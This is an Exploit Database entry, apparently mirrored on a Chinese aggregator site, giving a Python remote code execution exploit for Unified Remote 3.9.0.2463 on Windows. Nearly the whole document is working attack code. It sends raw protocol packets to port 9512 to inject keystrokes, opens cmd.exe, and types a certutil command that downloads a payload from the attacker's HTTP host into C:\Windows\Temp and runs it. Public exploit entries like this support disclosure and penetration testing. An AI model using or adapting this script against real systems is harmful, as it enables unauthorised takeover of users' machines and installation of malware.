Unified Remote 3.9.0.2463 – Remote Code Execution

Exploit Database
111 阅读

作者： H4rk3nz0

日期： 2021-02-24
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/49587/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution

# Author: H4rk3nz0

# Vendor Homepage: https://www.unifiedremote.com/

# Software Link: https://www.unifiedremote.com/download

# Tested on: Windows 10, 10.0.19042 Build 19042

#!/usr/bin/python

import socket

import sys

import os

from time import sleep

target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

port = 9512

# Packet Data Declarations; Windows, Space and Enter have non-standard values

open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862"

"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400"

"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831"

"000356657273696f6e000000000a00").decode("hex")

open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7"

"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453"

"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646"

"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571"

"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000"

).decode("hex")

one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024"

"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756"

"5730002000556616c756500").decode("hex")

two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007"

"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex")

three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730"

"386531346535323834636238310000").decode("hex")

win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726"

"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065"

"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797"

"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055"

"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6"

"9642d643730386531346535323834636238310000").decode("hex")

ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172"

"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000"

"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000"

"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730"

"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365"

"00616e64726f69642d643730386531346535323834636238310000").decode("hex")

space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6"

"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617"

"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650"

"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756"

"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726"

"36500616e64726f69642d643730386531346535323834636238310000").decode("hex")

# ASCII to Hex Conversion Set

characters={

"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",

"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",

"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",

"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",

"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",

"+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",

">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",

"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",

"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

# User Specified arguments

try:

rhost = sys.argv[1]

lhost = sys.argv[2]

payload = sys.argv[3]

except:

print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")

# Send Windows Key Input Twice

def SendWin():

target.sendto(win_key,(rhost, port))

sleep(0.4)

# Send Enter/Return Key Input

def SendReturn():

target.sendto(ret_key,(rhost, port))

sleep(0.4)

# Send String Characters

def SendString(string, rhost):

for char in string:

if char == " ":

target.sendto(space_key,(rhost, port))

sleep(0.02)

else:

convert = characters[char].decode("hex")

target.sendto(one + convert + two + convert + three,(rhost, port))

sleep(0.02)

# Main Execution

def main():

target.connect((rhost,port))

sleep(0.5)

print("[+] Connecting to target...")

target.sendto(open,(rhost,port)) # Initialize Connection to Unified

sleep(0.02)

target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection

print("[+] Popping Start Menu")

sleep(0.02)

SendWin()

sleep(0.3)

print("[+] Opening CMD")

SendString("cmd.exe", rhost)

sleep(0.3)

SendReturn()

sleep(0.3)

print("[+] *Super Fast Hacker Typing*")

SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload

sleep(0.3)

print("[+] Downloading Payload")

SendReturn()

sleep(3)

SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload

sleep(0.3)

SendReturn()

print("[+] Done! Check listener?")

target.close()

if __name__=="__main__":

main()